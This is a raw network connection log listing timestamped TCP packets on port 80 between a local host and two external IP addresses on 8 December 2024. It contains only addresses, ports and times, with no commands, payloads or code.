Dec 8, 2024 19:52:31.626734972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.626755953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.627376080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.627386093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.627423048 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.627434969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.667329073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.667366028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.667393923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.667416096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.667565107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.667603016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.667722940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.667771101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.667906046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.667949915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.668508053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.668565035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.668890953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.668940067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.669382095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.669447899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.669469118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.669507027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.670118093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.670164108 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.670253038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.670298100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.671039104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.671102047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.671120882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.671161890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.671838999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.671884060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.671892881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.671922922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.672700882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.672759056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.672832012 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.672877073 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.673469067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.673511982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.673557043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.673597097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.674240112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.674283981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.674304008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.674340963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.675021887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.675081968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.727564096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.727654934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.727664948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.727691889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.727871895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.727915049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.727920055 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.727953911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.728760958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.728816986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.728844881 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.728883982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.729607105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.729655981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.729763031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.729808092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.730379105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.730423927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.730582952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.730628014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.731465101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.731511116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.731590033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.731642008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.732397079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.732443094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.732537985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.732578039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.733221054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.733264923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.733274937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.733308077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.733993053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.734050035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.734131098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.734174013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.734721899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.734766960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.734834909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.734878063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.735414982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.735460043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.801707029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.801790953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.801873922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.801934958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.802047968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.802066088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.802093029 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.802107096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.802844048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.802891016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.802911043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.802927017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.803778887 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.803836107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.803864956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.803901911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.804435968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.804483891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.804550886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.804596901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.805274963 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.805324078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.805361986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.805399895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.806052923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.806101084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.806158066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.806200981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.806873083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.806916952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.807070971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.807116985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.807688951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.807737112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.807790995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.807841063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.808515072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.808561087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.808590889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.808625937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.809438944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.809478045 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.809494019 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.809518099 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.810148001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:31.810194016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.838928938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:31.958461046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.322158098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.322186947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.322231054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.322282076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.322439909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.322484016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.322521925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.322559118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.323244095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.323267937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.323297024 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.323321104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.324043989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.324090958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.324172974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.324213982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.324876070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.324939013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.325154066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.325200081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.325680017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.325697899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.325737000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.325747967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.326483011 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.326529980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.326546907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.326591969 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.327361107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.327414036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.327491045 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.327539921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.328279972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.328334093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.328473091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.328519106 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.329107046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.329147100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.329231977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.329277992 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.329957962 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.330005884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.330166101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.330216885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.330780983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.330799103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.330827951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.330838919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.331443071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.331491947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.331612110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.331657887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.332345009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.332391024 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.332498074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.332544088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.333107948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.333154917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.333206892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.333255053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.333906889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.333950996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.334038973 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.334076881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.334616899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.334662914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.334779024 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.334819078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.335401058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.335442066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.335515976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.335553885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.336345911 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.336390972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.336414099 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.336452961 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.337188959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.337233067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.337275982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.337316036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.337884903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.337932110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.337985992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.338027954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.338670015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.338713884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.338864088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.338907003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.339574099 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.339622021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.339659929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.339696884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.340305090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.340348005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.340401888 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.340445042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.341144085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.341187954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.341389894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.341439009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.341917992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.341960907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.342098951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.342144012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.342749119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.342793941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.342809916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.342844009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.343610048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.343656063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.343714952 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.343749046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.344352961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.344397068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.344449043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.344520092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.345244884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.345288038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.345313072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.345386028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.346012115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.346059084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.346138954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.346205950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.346832037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.346851110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.346879005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.346889973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.347661972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.347712994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.347763062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.347824097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.767271996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.767311096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:32.889167070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:32.889182091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:33.716032982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:33.716162920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:33.755595922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:33.875566959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:34.202004910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:34.202097893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:34.202155113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:34.202199936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:34.202328920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:34.202373028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:34.204611063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:34.324381113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:34.651544094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:34.651654959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:34.672436953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:34.792998075 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:35.604266882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:35.604332924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:35.635561943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:35.754858017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:36.075350046 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:36.075408936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:36.079077005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:36.198400021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:36.198503017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:36.198656082 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:36.318444014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.537177086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.537199020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.537276030 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.537316084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.539371014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539383888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539396048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539432049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.539468050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.539838076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539856911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539869070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539885044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.539901018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.539978027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.539989948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.540014029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.540035963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.656929970 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.657058954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.657114983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.657160044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.665014982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.665026903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.665075064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.731657982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.731749058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.731759071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.731796980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.735836029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.735912085 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.736093998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.736171007 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.744369030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.744461060 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:37.744539976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:37.744585991 CET	49757	80	192.168.2.4	185.215.113.16
